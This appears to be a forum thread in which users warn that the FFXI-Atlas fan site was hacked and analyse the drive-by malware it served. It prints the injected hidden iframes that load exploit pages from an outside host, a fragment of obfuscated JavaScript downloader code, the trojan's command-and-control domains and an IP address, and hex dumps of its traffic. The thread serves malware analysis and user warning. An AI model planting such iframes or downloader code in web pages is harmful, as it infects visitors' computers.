[Aikar]

Was alerted that FFXI-Atlas was hacked again, so please do not visit FFXI Atlas w/o protection.

It appears to be an IE only exploit, although I was told the exploit crashed firefox so please take precautions and follow the guides

The file is named taizi.exe located on the domain usa.ccxtt.com

It is saved to C:\explorer.exe and is executed from there.

Exploitation method is actually multiple.

Site is infected with a malicious iframe, in which contains... more iframes!

THESE ARE VIRUSES. DONT GO TO THESE LINKS

<iframe src=http://usa.ccxtt.com/0614.HTML width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/mdb.HTML width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/B_ICE.HTML width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/ffff.html width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/flash.htm width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/ifff.html width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/re10.htm width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/re11.htm width=100 height=0></iframe>
<iframe src=http://usa.ccxtt.com/Yahoo1.html width=100 height=0></iframe>

<script src=Ajax.gif></script>
<script language="javascript" src="http://count8.51yes.com/click.aspx?id=84422514&logo=1"></script>

Each one is trying a different exploit vector.

One of them is referencing a clsid:

[05:35:24am] <~Aikar> var LiYmexx='MicroSoft.pif';
[05:35:24am] <~Aikar> var LiYme='MicroSoft.vbs';
[05:35:24am] <~Aikar> var chilam=document["createElement"]("object");
[05:35:24am] <~Aikar> var CID="clsid:";
[05:35:24am] <~Aikar> var CIDs="0-983A-0";
[05:35:24am] <~Aikar> var CIDss="0C04";
[05:35:24am] <~Aikar> var CIDsss="FC29E36";
[05:35:24am] <~Aikar> var CIDx="BD96C";
[05:35:24am] <~Aikar> var CIDxx="556-65A3-11D";
[05:35:24am] <~Aikar> var LBExml="Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P";
[05:35:24am] <~Aikar> var LBEado="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";

But google returns nothing on that ID, so i have no clue what software its trying to exploit.

Please use firefox with noscript and adblock and protect yourself as said in these links:
http://forums.window...showtopic=11323
http://forums.window...showtopic=13208

If anyone wants to run it in a virtual machine to diagnose its actions better, please post. I'm just viewing the source code.

[Kuuhalee]

Just infected myself in a VM ... attempting to locate files that it installed.

[Kuuhalee]

Installs Service :
VSSC - (c:\windows\system32\thtpni.dll)
TCPIP - (c:\windows\system32\tcpip.sys)
[random generated character string] - (c:\windows\system32\drivers\thtpni.sys)

Connects to Website (every 30 seconds) :
http://www.crackwg.net/pcshare/pc.txt
- [Contents of File = "59.34.148.248:7866"]

Also Attempts to Connect (Undetermined Amount of Time) :
http://59.34.148.248...3853/753874.jsp (may be randomly generated)



That's all the information that I've gleaned so far. Attempting to do an in-depth analysis of anything else that might have been changed. Also trying to copy over the POL Viewer for more testing.

[Kuuhalee]

Connection to 59.34.148.248:7866 seems persistent and does not terminate unless connection is lost to the host. If connection to the host is lost, the trojan will attempt to connect to crackwg.net every 30 seconds and attempt to connect to the specified host in the pc.txt file. Once connected to the specified host, it will cease attempting to connect to crackwg.net. The path to the JSP and the JSP file itself IS randomly generated. I am guessing that it is generated based on date and current time.



Initial Data Received from 59.34.148.248\*\*.JSP :

Send: Return Code: 0x00000000
00000000  52 0D 12 12 8A 1A 12 12 12 D2 E5 19 F6 16 12 12	R...............
00000010  A7 13 12 12 12 12 12 12 10 12 12 12 13 12 12 12	................
00000020  56 21 13 12 53 7B B9 14 8D 51 2F 58 A2 A5 F3 93	V!..S{...Q/X....
00000030  68 B7 D6 11 12 12 12 12 12 12 12 12 12 12 12 12	h...............
00000040  12 12 12 12 12 12 12 12 46 5B 55 57 40 59 24 12	........F[UW@Y$.
00000050  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000060  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000070  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000080  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000090  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000A0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000B0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000C0  12 12 12 12 12 12 12 12 46 5B 55 57 40 59 24 12	........F[UW@Y$.
000000D0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000E0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000000F0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000100  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000110  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000120  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000130  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000140  12 12 12 12 12 12 12 12 D4 C7 DF BA AD DF A9 B5	................
00000150  C5 FB 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000160  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000170  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
00000180  12 12 12 12 12 12 12 12 A9 F3 C6 A3 A2 F4 A3 AC	................
00000190  49 20 22 22 25 23 23 20 27 4F 12 12 12 12 12 12	I ""%## 'O......
000001A0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000001B0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................
000001C0  12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	................

Subsequent Data Received :

Receive: Return Code: 0x00000000
00000000  48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D	HTTP/1.1 200 OK.
00000010  0A 44 61 74 65 3A 20 54 20 47 4D 54 0D 0A 43 6F	.Date: T GMT..Co
00000020  6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 38 0D	ntent-Length: 8.
00000030  0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65	.Connection: Kee
00000040  70 2D 41 6C 69 76 65 0D 0A 43 61 63 68 65 2D 43	p-Alive..Cache-C
00000050  6F 6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65	ontrol: no-cache
00000060  0D 0A 0D 0A 4D 1F 00 00 00 00 00 00				....M.......

[souleman]

taizi seems like an odd name.. Thats a legit executible file for a chinese program. (Pinyin Star 2000)

The 2nd section Aikar posted (CLSID section), looks like a portion of Trojan-Downloader.JS.Confusion.a that uses javascript. Confusion.a (through .h or so), were variants of Win32/TrojanDownloader.Small.NZK.

Guessing this is the same type thing.